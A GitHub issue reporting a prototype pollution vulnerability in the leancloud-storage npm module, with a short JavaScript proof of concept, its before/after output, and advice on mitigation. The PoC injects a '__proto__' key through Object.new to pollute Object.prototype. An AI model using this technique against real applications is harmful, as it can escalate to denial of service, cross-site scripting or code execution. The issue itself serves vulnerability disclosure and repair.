Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Prototype pollution vulnerability affecting leancloud-storage module, versions >=3.4.2 <=4.15.2 #679

Open
tariqhawis opened this issue Mar 14, 2024 · 0 comments

Comments

@tariqhawis
Copy link

Overview

The vulnerability located at AV.Object (dist/node/object.js:107). where set() method
used to unsafely assign source property to the destination. An attacker can be exploit this method to copy malicious property to the built-in Object.prototype through the special properties __proto__ or constructor.prototype.
Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service,
remote code execution or cross-site scripting attacks.

PoC:

(async () => {
  const lib = await import('leancloud-storage');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
  lib.default.Object.new ({ "__proto__.polluted": true})
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Output of a successful fix:

Before Attack:  {}
After Attack:  {}

How to prevent:

Assign or copy a property should only be applied an own property of the destination object, thus, check for that (e.g using hasOwnProperty) is sufficient. Alternatively, block the property names __proto__ or constructor assigned. Other recommendations at Snyk.io:
https://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant